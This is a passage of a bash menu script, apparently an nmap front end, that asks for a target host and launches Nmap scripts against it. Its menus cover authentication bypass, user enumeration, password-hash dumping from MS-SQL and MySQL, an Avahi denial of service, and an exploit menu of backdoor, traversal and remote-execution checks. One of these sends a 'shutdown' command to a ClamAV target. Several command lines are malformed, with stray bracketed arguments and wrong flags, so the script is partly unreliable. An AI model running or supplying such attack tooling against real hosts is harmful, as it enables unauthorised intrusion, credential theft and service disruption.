  821. echo -e $white" [$okegreen"26"$white]$cyan netbus-auth-bypass "
  822. echo -e $white" [$okegreen"27"$white]$cyan oracle-enum-users "
  823. echo -e $white" [$okegreen"28"$white]$cyan realvnc-auth-bypass "
  824. echo -e $white" [$okegreen"29"$white]$cyan sip-enum-users "
  825. echo -e $white" [$okegreen"30"$white]$cyan smb-enum-users "
  826. echo -e $white" [$okegreen"31"$white]$cyan smtp-enum-users "
  827. echo -e $white" [$okegreen"32"$white]$cyan snmp-win32-users "
  828. echo -e $white" [$okegreen"33"$white]$cyan x11-access "
  829. echo -e $white" [$okegreen"34"$white]$cyan Back "
  830. echo -e " "
  831. echo -n -e $red' \033[4mScreetsec@nse-auth:\033[0m>> '; tput sgr0 #insert your choice
  832. read win
  833. if test $win == '1'
  834. then
  835. echo
  836. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  837. read ip
  838. $urxvt -p 8009 $ip --script ajp-auth [--script-args ajp-auth.path=/login] &
  839. elif test $win == '2'
  840. then
  841. echo
  842. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  843. read ip
  844. $urxvt -sV -sC $ip &
  845. elif test $win == '3'
  846. then
  847. echo
  848. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  849. read ip
  850. echo -ne $okegreen " What is your cmd user: " ; tput sgr0
  851. read user
  852. echo -ne $okegreen " What is your cmd pass: " ; tput sgr0
  853. read pass
  854. $urxvt -p 2050 $ip --script domcon-cmd --script-args domcon-cmd.cmd="show server" domcon-cmd.user="$user",domcon-cmd.pass="$pass" &
  855. elif test $win == '4'
  856. then
  857. echo
  858. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  859. read ip
  860. $urxvt --script domino-enum-users -p 1352 $ip &
  861. elif test $win == '5'
  862. then
  863. echo
  864. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  865. read ip
  866. $urxvt -sV -sC $ip &
  867. elif test $win == '6'
  868. then
  869. echo
  870. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  871. read ip
  872. $urxvt --script http-auth [--script-args http-auth.path=/login] -p80 $ip &
  873. elif test $win == '7'
  874. then
  875. echo
  876. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  877. read ip
  878. echo -ne $okegreen " What is your Port Target " ; tput sgr0
  879. read port
  880. $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip &
  881. elif test $win == '8'
  882. then
  883. echo
  884. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  885. read ip
  886. $urxvt --script=http-config-backup $ip &
  887. elif test $win == '9'
  888. then
  889. echo
  890. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  891. read ip
  892. $urxvt -p 80 --script http-default-accounts $ip &
  893. elif test $win == '10'
  894. then
  895. echo
  896. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  897. read ip
  898. echo -ne $okegreen " What the username: " ; tput sgr0
  899. read user
  900. echo -ne $okegreen " What the password: " ; tput sgr0
  901. read pass
  902. $urxvt --script domino-enum-passwords -p 80 $ip --script-args domino-enum-passwords.username=$user,domino-enum-passwords.password=$pass &
  903. elif test $win == '11'
  904. then
  905. echo
  906. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  907. read ip
  908. $urxvt p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip &
  909. elif test $win == '12'
  910. then
  911. echo
  912. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  913. read ip
  914. $urxvt -sV --script=http-userdir-enum $ip &
  915. elif test $win == '13'
  916. then
  917. echo
  918. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  919. read ip
  920. $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip &
  921. elif test $win == '14'
  922. then
  923. echo
  924. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  925. read ip
  926. $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip &
  927. elif test $win == '15'
  928. then
  929. echo
  930. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  931. read ip
  932. echo -ne $okegreen " The username used for authentication: " ; tput sgr0
  933. read user
  934. echo -ne $okegreen " The password used for authentication : " ; tput sgr0
  935. read pass
  936. $urxvt -p 9088 $ip --script informix-query --script-args informix-query.username=$user,informix-query.password=$pass &
  937. elif test $win == '16'
  938. then
  939. echo
  940. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  941. read ip
  942. echo -ne $okegreen " The username used for authentication: " ; tput sgr0
  943. read user
  944. echo -ne $okegreen " The password used for authentication : " ; tput sgr0
  945. read pass
  946. $urxvt -p 9088 $ip --script informix-tables --script-args informix-tables.username=$user,informix-tables.password=$pass &
  947. elif test $win == '17'
  948. then
  949. echo
  950. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  951. read ip
  952. $urxvt -p 88 $ip --script krb5-enum-users --script-args krb5-enum-users.realm='test' &
  953. elif test $win == '18'
  954. then
  955. echo
  956. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  957. read ip
  958. $urxvt -p 1433 $ip --script ms-sql-dump-hashes &
  959. elif test $win == '19'
  960. then
  961. echo
  962. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  963. read ip
  964. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  965. read port
  966. $urxvt -p $port --script ms-sql-empty-password --script-args mssql.instance-all $ip &
  967. elif test $win == '20'
  968. then
  969. echo
  970. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  971. read ip
  972. echo -ne $okegreen " The username used for authentication: " ; tput sgr0
  973. read user
  974. echo -ne $okegreen " The password used for authentication : " ; tput sgr0
  975. read pass
  976. $urxvt -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=$user,mssql.password=$pass $ip &
  977. elif test $win == '21'
  978. then
  979. echo
  980. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  981. read ip
  982. echo -ne $okegreen " The username to use to connect to the server " ; tput sgr0
  983. read user
  984. echo -ne $okegreen " The password to use to connect to the server: " ; tput sgr0
  985. read pass
  986. $urxvt -p 3306 $ip --script mysql-dump-hashes --script-args="username=$user,password=$pass" &
  987. elif test $win == '22'
  988. then
  989. echo
  990. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  991. read ip
  992. $urxvt -sV --script=mysql-empty-password $ip &
  993. elif test $win == '23'
  994. then
  995. echo
  996. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  997. read ip
  998. echo -ne $okegreen " The username to use to connect to the server (Optional):" ; tput sgr0
  999. read user
  1000. echo -ne $okegreen " The password to use to connect to the server (Optional): " ; tput sgr0
  1001. read pass
  1002. echo -ne $okegreen " The query for which to return the results " ; tput sgr0
  1003. read query
  1004. $urxvt -p 3306 $ip --script mysql-query --script-args="query="$query"[,username=$username,password=$pass]" &
  1005. elif test $win == '24'
  1006. then
  1007. echo
  1008. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1009. read ip
  1010. $urxvt -sV --script=mysql-users $ip &
  1011. elif test $win == '25'
  1012. then
  1013. echo
  1014. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1015. read ip
  1016. $urxvt -sV --script=ncp-enum-users $ip &
  1017. elif test $win == '26'
  1018. then
  1019. echo
  1020. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1021. read ip
  1022. $urxvt -p 12345 --script netbus-auth-bypass $ip &
  1023. elif test $win == '27'
  1024. then
  1025. echo
  1026. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1027. read ip
  1028. $urxvt --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 $ip &
  1029. elif test $win == '28'
  1030. then
  1031. echo
  1032. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1033. read ip
  1034. $urxvt -sV -sC $ip &
  1035. elif test $win == '29'
  1036. then
  1037. echo
  1038. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1039. read ip
  1040. $urxvt --script=sip-enum-users -sU -p 5060 $ip &
  1041. elif test $win == '30'
  1042. then
  1043. echo
  1044. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1045. read ip
  1046. $urxvt -script smb-enum-users.nse -p 445 $ip &
  1047. elif test $win == '31'
  1048. then
  1049. echo
  1050. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1051. read ip
  1052. $urxvt --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 $ip &
  1053. elif test $win == '32'
  1054. then
  1055. echo
  1056. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1057. read ip
  1058. $urxvt -sU -p 161 --script=snmp-win32-users $ip &
  1059. elif test $win == '33'
  1060. then
  1061. echo
  1062. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1063. read ip
  1064. $urxvt --sV -sC $ip &
  1065. elif test $win == '34'
  1066. then
  1067. nse
  1068. else
  1069. echo ""
  1070. echo -e $okegreen " Incorrect Number"
  1071. fi
  1072. echo ""
  1073. echo ""
  1074. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  1075. read back
  1076. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  1077. then
  1078. clear
  1079. menu
  1080. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  1081. then
  1082. auth
  1083. fi
  1084. }
  1086. function brd () {
  1087. clear
  1088. echo
  1089. echo
  1090. echo -e $white" [$okegreen"01"$white]$cyan broadcast-ataoe-discover "
  1091. echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos "
  1092. echo -e $white" [$okegreen"03"$white]$cyan broadcast-bjnp-discover "
  1093. echo -e $white" [$okegreen"04"$white]$cyan broadcast-db2-discover "
  1094. echo -e $white" [$okegreen"05"$white]$cyan broadcast-dhcp-discover "
  1095. echo -e $white" [$okegreen"06"$white]$cyan broadcast-dhcp6-discover "
  1096. echo -e $white" [$okegreen"07"$white]$cyan broadcast-dns-service-discovery "
  1097. echo -e $white" [$okegreen"08"$white]$cyan broadcast-dropbox-listener "
  1098. echo -e $white" [$okegreen"09"$white]$cyan broadcast-eigrp-discovery "
  1099. echo -e $white" [$okegreen"10"$white]$cyan broadcast-igmp-discovery "
  1100. echo -e $white" [$okegreen"11"$white]$cyan broadcast-listener "
  1101. echo -e $white" [$okegreen"12"$white]$cyan broadcast-ms-sql-discover "
  1102. echo -e $white" [$okegreen"13"$white]$cyan broadcast-netbios-master-browser "
  1103. echo -e $white" [$okegreen"14"$white]$cyan broadcast-networker-discover "
  1104. echo -e $white" [$okegreen"15"$white]$cyan broadcast-novell-locate "
  1105. echo -e $white" [$okegreen"16"$white]$cyan broadcast-pc-anywhere "
  1106. echo -e $white" [$okegreen"17"$white]$cyan broadcast-pc-duo "
  1107. echo -e $white" [$okegreen"18"$white]$cyan broadcast-pim-discovery "
  1108. echo -e $white" [$okegreen"19"$white]$cyan broadcast-ping "
  1109. echo -e $white" [$okegreen"20"$white]$cyan broadcast-pppoe-discover "
  1110. echo -e $white" [$okegreen"21"$white]$cyan broadcast-rip-discover "
  1111. echo -e $white" [$okegreen"22"$white]$cyan broadcast-ripng-discover "
  1112. echo -e $white" [$okegreen"23"$white]$cyan broadcast-sonicwall-discover "
  1113. echo -e $white" [$okegreen"24"$white]$cyan broadcast-sybase-asa-discover "
  1114. echo -e $white" [$okegreen"25"$white]$cyan broadcast-tellstick-discover "
  1115. echo -e $white" [$okegreen"26"$white]$cyan broadcast-upnp-info "
  1116. echo -e $white" [$okegreen"27"$white]$cyan broadcast-versant-locate "
  1117. echo -e $white" [$okegreen"28"$white]$cyan broadcast-wake-on-lan "
  1118. echo -e $white" [$okegreen"29"$white]$cyan broadcast-wpad-discover "
  1119. echo -e $white" [$okegreen"30"$white]$cyan broadcast-wsdd-discover "
  1120. echo -e $white" [$okegreen"31"$white]$cyan broadcast-xdmcp-discover "
  1121. echo -e $white" [$okegreen"32"$white]$cyan eap-info "
  1122. echo -e $white" [$okegreen"33"$white]$cyan ipv6-multicast-mld-list "
  1123. echo -e $white" [$okegreen"34"$white]$cyan knx-gateway-discover "
  1124. echo -e $white" [$okegreen"35"$white]$cyan llmnr-resolve "
  1125. echo -e $white" [$okegreen"36"$white]$cyan lltd-discovery "
  1126. echo -e $white" [$okegreen"37"$white]$cyan mrinfo "
  1127. echo -e $white" [$okegreen"38"$white]$cyan mtrace "
  1128. echo -e $white" [$okegreen"39"$white]$cyan targets-ipv6-multicast-echo "
  1129. echo -e $white" [$okegreen"40"$white]$cyan targets-ipv6-multicast-invalid-dst "
  1130. echo -e $white" [$okegreen"41"$white]$cyan targets-ipv6-multicast-mld "
  1131. echo -e $white" [$okegreen"42"$white]$cyan targets-ipv6-multicast-slaac "
  1132. echo -e $white" [$okegreen"43"$white]$cyan targets-sniffer "
  1133. echo -e $white" [$okegreen"44"$white]$cyan back "
  1134. echo -n -e $red' \033[4mScreetsec@nse-broadcast:\033[0m>> '; tput sgr0 #insert your choice
  1135. read min
  1136. if test $min == '1'
  1137. then
  1138. echo
  1139. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1140. read ie
  1141. $urxvt --script broadcast-ataoe-discover -e $ie &
  1142. elif test $min == '2'
  1143. then
  1144. echo
  1145. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1146. read ie
  1147. $urxvt --script=broadcast-avahi-dos -e $ie &
  1148. elif test $min == '3'
  1149. then
  1150. echo
  1151. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1152. read ie
  1153. $urxvt --script broadcast-bjnp-discover -e $ie &
  1154. elif test $min == '4'
  1155. then
  1156. echo
  1157. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1158. read ie
  1159. $urxvt --script db2-discover -e $ie &
  1160. elif test $min == '5'
  1161. then
  1162. echo
  1163. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1164. read ie
  1165. $urxvt --script broadcast-dhcp-discover -e $ie &
  1166. elif test $min == '6'
  1167. then
  1168. echo
  1169. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1170. read ie
  1171. $urxvt -6 --script broadcast-dhcp6-discover -e $ie &
  1172. elif test $min == '7'
  1173. then
  1174. echo
  1175. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1176. read ie
  1177. $urxvt --script=broadcast-dns-service-discovery -e $ie &
  1178. elif test $min == '8'
  1179. then
  1180. echo
  1181. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1182. read ie
  1183. $urxvt --script=broadcast-dropbox-listener --script-args=newtargets -Pn -e $ie &
  1184. elif test $min == '9'
  1185. then
  1186. echo
  1187. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1188. read ip
  1189. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1190. read ie
  1191. $urxvt --script=broadcast-eigrp-discovery $ip -e $ie &
  1192. elif test $min == '10'
  1193. then
  1194. echo
  1195. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1196. read ie
  1197. $urxvt --script broadcast-igmp-discovery -e $ie &
  1198. elif test $min == '11'
  1199. then
  1200. echo
  1201. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1202. read ie
  1203. $urxvt --script broadcast-listener -e $ie &
  1204. elif test $min == '12'
  1205. then
  1206. echo
  1207. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1208. read ie
  1209. $urxvt nmap --script broadcast-ms-sql-discover -e $ie &
  1210. elif test $min == '13'
  1211. then
  1212. echo
  1213. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1214. read ie
  1215. $urxvt --script=broadcast-netbios-master-browser -e $ie &
  1216. elif test $min == '14'
  1217. then
  1218. echo
  1219. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1220. read ie
  1221. $urxvt --script broadcast-networker-discover -e $ie &
  1222. elif test $min == '15'
  1223. then
  1224. echo
  1225. echo -ne $okegreen " What is your Targets" ; tput sgr0
  1226. read ie
  1227. $urxvt -sV --script=broadcast-novell-locate $ie &
  1228. elif test $min == '16'
  1229. then
  1230. echo
  1231. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1232. read ie
  1233. $urxvt --script broadcast-pc-anywhere -e $ie &
  1234. elif test $min == '17'
  1235. then
  1236. echo
  1237. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1238. read ie
  1239. $urxvt --script broadcast-pc-duo -e $ie &
  1240. elif test $min == '18'
  1241. then
  1242. echo
  1243. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1244. read ie
  1245. $urxvt nmap --script broadcast-pim-discovery -e $ie &
  1246. elif test $min == '19'
  1247. then
  1248. echo
  1249. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1250. read ie
  1251. echo -ne $okegreen " Default value for TTL is 64 & the length of the payload is 0" ; tput sgr0
  1252. read ttl
  1253. echo -ne $okegreen " The payload is consisted of random bytes." ; tput sgr0
  1254. read payload
  1255. echo -ne $okegreen " Timespec specifying how long to wait for response (default 3s)" ; tput sgr0
  1256. read ti
  1257. echo -ne $okegreen " Number specifying how many ICMP probes should be sent (default 1)" ; tput sgr0
  1258. read np
  1259. $urxvt -e $ie [--ttl $ttl] [--data-length $payload] --script broadcast-ping [--script-args [broadcast-ping.timeout=$ti],[num-probes=$np]]] &
  1260. elif test $min == '20'
  1261. then
  1262. echo
  1263. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1264. read ie
  1265. $urxvt --script broadcast-pppoe-discover -e $ie &
  1266. elif test $min == '21'
  1267. then
  1268. echo
  1269. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1270. read ie
  1271. $urxvt --script broadcast-rip-discover -e $ie &
  1272. elif test $min == '22'
  1273. then
  1274. echo
  1275. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1276. read ie
  1277. $urxvt --script broadcast-ripng-discover -e $ie &
  1278. elif test $min == '23'
  1279. then
  1280. echo
  1281. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1282. read ie
  1283. $urxvt -e $ie --script broadcast-sonicwall-discover &
  1284. elif test $min == '24'
  1285. then
  1286. echo
  1287. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1288. read ie
  1289. $urxvt --script broadcast-sybase-asa-discover -e $ie &
  1290. elif test $min == '25'
  1291. then
  1292. echo
  1293. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1294. read ie
  1295. $urxvt --script broadcast-tellstick-discover -e $ie &
  1296. elif test $min == '26'
  1297. then
  1298. echo
  1299. echo -ne $okegreen " What is your Targets" ; tput sgr0
  1300. read ip
  1301. $urxvt -sV --script=broadcast-upnp-info $ip &
  1302. elif test $min == '27'
  1303. then
  1304. echo
  1305. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1306. read ie
  1307. $urxvt --script broadcast-versant-locate -e $ie &
  1308. elif test $min == '28'
  1309. then
  1310. echo
  1311. echo -ne $okegreen " The MAC address of the remote system to wake up" ; tput sgr0
  1312. read mac
  1313. $urxvt --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC="$mac" &
  1314. elif test $min == '29'
  1315. then
  1316. echo
  1317. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1318. read ie
  1319. $urxvt --script broadcast-wpad-discover -e $ie &
  1320. elif test $min == '30'
  1321. then
  1322. echo
  1323. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1324. read ie
  1325. $urxvt --script broadcast-wsdd-discover -e $ie &
  1326. elif test $min == '31'
  1327. then
  1328. echo
  1329. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1330. read ie
  1331. $urxvt --script broadcast-xdmcp-discover -e $ie &
  1332. elif test $min == '32'
  1333. then
  1334. echo
  1335. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1336. read ip
  1337. $urxvt -e interface --script eap-info [--script-args="eap-info.identity=0-user,eap-info.scan={13,50}"] $ip &
  1338. elif test $min == '33'
  1339. then
  1340. echo
  1341. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1342. read ie
  1343. $urxvt --script=ipv6-multicast-mld-list -e $ie &
  1344. elif test $min == '34'
  1345. then
  1346. echo
  1347. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1348. read ie
  1349. $urxvt --script knx-gateway-discover -e $ie &
  1350. elif test $min == '35'
  1351. then
  1352. echo
  1353. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1354. read ie
  1355. echo -ne $okegreen " Hostname to resolve : " ; tput sgr0
  1356. read hostname
  1357. $urxvt --script llmnr-resolve --script-args "llmnr-resolve.hostname=$hostname" -e $ie &
  1358. elif test $min == '36'
  1359. then
  1360. echo
  1361. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1362. read ie
  1363. $urxvt -e $ie --script lltd-discovery &
  1364. elif test $min == '37'
  1365. then
  1366. echo
  1367. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1368. read ie
  1369. $urxvt --script mrinfo -e $ie &
  1370. elif test $min == '38'
  1371. then
  1372. echo
  1373. echo -ne $okegreen " Source address from which to traceroute." ; tput sgr0
  1374. read rt
  1375. $urxvt --script mtrace --script-args "mtrace.fromip=$rt" &
  1376. elif test $min == '39'
  1377. then
  1378. echo
  1379. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1380. read ie
  1381. $urxvt --script=targets-ipv6-multicast-echo.nse --script-args "newtargets,interface=$ie" -sL &
  1382. elif test $min == '40'
  1383. then
  1384. echo
  1385. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1386. read ie
  1387. $urxvt --script=targets-ipv6-multicast-invalid-dst.nse --script-args "newtargets,interface=$ie" -sP &
  1388. elif test $min == '41'
  1389. then
  1390. echo
  1391. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1392. read ie
  1393. $urxvt --script=targets-ipv6-multicast-mld.nse --script-args "newtargets,interface=$ie" &
  1394. elif test $min == '42'
  1395. then
  1396. echo
  1397. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1398. read ie
  1399. $urxvt --script targets-ipv6-multicast-slaac --script-args "newtargets,interface=$ie" -sP &
  1400. elif test $min == '43'
  1401. then
  1402. echo
  1403. echo -ne $okegreen " What is your Interfaces" ; tput sgr0
  1404. read ie
  1405. $urxvt -sL --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=5s,targets-sniffer.iface=$ie &
  1406. elif test $min == '44'
  1407. then
  1408. nse
  1409. else
  1410. echo ""
  1411. echo -e $okegreen " Incorrect Number"
  1412. fi
  1413. echo ""
  1414. echo ""
  1415. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  1416. read back
  1417. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  1418. then
  1419. clear
  1420. menu
  1421. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  1422. then
  1423. brd
  1424. fi
  1425. }
  1427. function exploit () {
  1428. clear
  1429. echo
  1430. echo
  1431. echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln "
  1432. echo -e $white" [$okegreen"02"$white]$cyan clamav-exec "
  1433. echo -e $white" [$okegreen"03"$white]$cyan distcc-cve2004-2687 "
  1434. echo -e $white" [$okegreen"04"$white]$cyan ftp-proftpd-backdoor "
  1435. echo -e $white" [$okegreen"05"$white]$cyan ftp-vsftpd-backdoor "
  1436. echo -e $white" [$okegreen"06"$white]$cyan http-adobe-coldfusion-apsa1301 "
  1437. echo -e $white" [$okegreen"07"$white]$cyan http-avaya-ipoffice-users "
  1438. echo -e $white" [$okegreen"08"$white]$cyan http-awstatstotals-exec "
  1439. echo -e $white" [$okegreen"09"$white]$cyan http-axis2-dir-traversal "
  1440. echo -e $white" [$okegreen"10"$white]$cyan http-barracuda-dir-traversal "
  1441. echo -e $white" [$okegreen"11"$white]$cyan http-coldfusion-subzero "
  1442. echo -e $white" [$okegreen"12"$white]$cyan http-csrf "
  1443. echo -e $white" [$okegreen"13"$white]$cyan http-dlink-backdoor "
  1444. echo -e $white" [$okegreen"14"$white]$cyan http-dombased-xss "
  1445. echo -e $white" [$okegreen"15"$white]$cyan http-fileupload-exploiter "
  1446. echo -e $white" [$okegreen"16"$white]$cyan http-huawei-hg5xx-vuln "
  1447. echo -e $white" [$okegreen"17"$white]$cyan http-litespeed-sourcecode-download "
  1448. echo -e $white" [$okegreen"18"$white]$cyan http-majordomo2-dir-traversal "
  1449. echo -e $white" [$okegreen"19"$white]$cyan http-phpmyadmin-dir-traversal "
  1450. echo -e $white" [$okegreen"20"$white]$cyan http-shellshock "
  1451. echo -e $white" [$okegreen"21"$white]$cyan http-stored-xss "
  1452. echo -e $white" [$okegreen"22"$white]$cyan http-tplink-dir-traversal "
  1453. echo -e $white" [$okegreen"23"$white]$cyan http-vuln-cve2006-3392 "
  1454. echo -e $white" [$okegreen"24"$white]$cyan http-vuln-cve2009-3960 "
  1455. echo -e $white" [$okegreen"25"$white]$cyan http-vuln-cve2012-1823 "
  1456. echo -e $white" [$okegreen"26"$white]$cyan http-vuln-cve2013-0156 "
  1457. echo -e $white" [$okegreen"27"$white]$cyan http-vuln-cve2013-6786 "
  1458. echo -e $white" [$okegreen"28"$white]$cyan http-vuln-cve2013-7091 "
  1459. echo -e $white" [$okegreen"29"$white]$cyan http-vuln-cve2014-3704 "
  1460. echo -e $white" [$okegreen"30"$white]$cyan http-vuln-cve2014-8877 "
  1461. echo -e $white" [$okegreen"31"$white]$cyan http-vuln-wnr1000-creds "
  1462. echo -e $white" [$okegreen"32"$white]$cyan irc-unrealircd-backdoor "
  1463. echo -e $white" [$okegreen"33"$white]$cyan jdwp-exec "
  1464. echo -e $white" [$okegreen"34"$white]$cyan jdwp-inject "
  1465. echo -e $white" [$okegreen"35"$white]$cyan qconn-exec "
  1466. echo -e $white" [$okegreen"36"$white]$cyan smb-vuln-conficker "
  1467. echo -e $white" [$okegreen"37"$white]$cyan smb-vuln-cve2009-3103 "
  1468. echo -e $white" [$okegreen"38"$white]$cyan smb-vuln-ms06-025 "
  1469. echo -e $white" [$okegreen"39"$white]$cyan smb-vuln-ms07-029 "
  1470. echo -e $white" [$okegreen"40"$white]$cyan smb-vuln-ms08-067 "
  1471. echo -e $white" [$okegreen"41"$white]$cyan smb-vuln-regsvc-dos "
  1472. echo -e $white" [$okegreen"42"$white]$cyan smtp-vuln-cve2010-4344 "
  1473. echo -e $white" [$okegreen"43"$white]$cyan supermicro-ipmi-conf "
  1474. echo -e $white" [$okegreen"44"$white]$cyan back "
  1475. echo -e " "
  1476. echo -n -e $red' \033[4mScreetsec@nse-exploit:\033[0m>> '; tput sgr0 #insert your choice
  1477. read cin
  1478. if test $cin == '1'
  1479. then
  1480. echo
  1481. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1482. read ip
  1483. $urxvt -sV --script=afp-path-vuln $ip &
  1484. elif test $cin == '2'
  1485. then
  1486. echo
  1487. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1488. read ip
  1489. $urxvt --script clamav-exec --script-args cmd='shutdown' $ip &
  1490. elif test $cin == '3'
  1491. then
  1492. echo
  1493. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1494. read ip
  1495. $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" &
  1496. elif test $cin == '4'
  1497. then
  1498. echo
  1499. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1500. read ip
  1501. $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
  1502. elif test $cin == '5'
  1503. then
  1504. echo
  1505. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1506. read ip
  1507. $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
  1508. elif test $cin == '6'
  1509. then
  1510. echo
  1511. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1512. read ip
  1513. $urxvt -p80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip &
  1514. elif test $cin == '7'
  1515. then
  1516. echo
  1517. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1518. read ip
  1519. $urxvt -sV --script http-avaya-ipoffice-users $ip &
  1520. elif test $cin == '8'
  1521. then
  1522. echo
  1523. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1524. read ip
  1525. $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' $ip &
  1526. elif test $cin == '9'
  1527. then
  1528. echo
  1529. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1530. read ip
  1531. $urxvt -p80 --script http-axis2-dir-traversal $ip &
  1532. elif test $cin == '10'
  1533. then
  1534. echo
  1535. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1536. read ip
  1537. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  1538. read port
  1539. $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip &
  1540. elif test $cin == '11'
  1541. then
  1542. echo
  1543. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1544. read ip
  1545. $urxvt -p 80 --script http-coldfusion-subzero --script-args basepath=/cf/ $ip &
  1546. elif test $cin == '12'
  1547. then
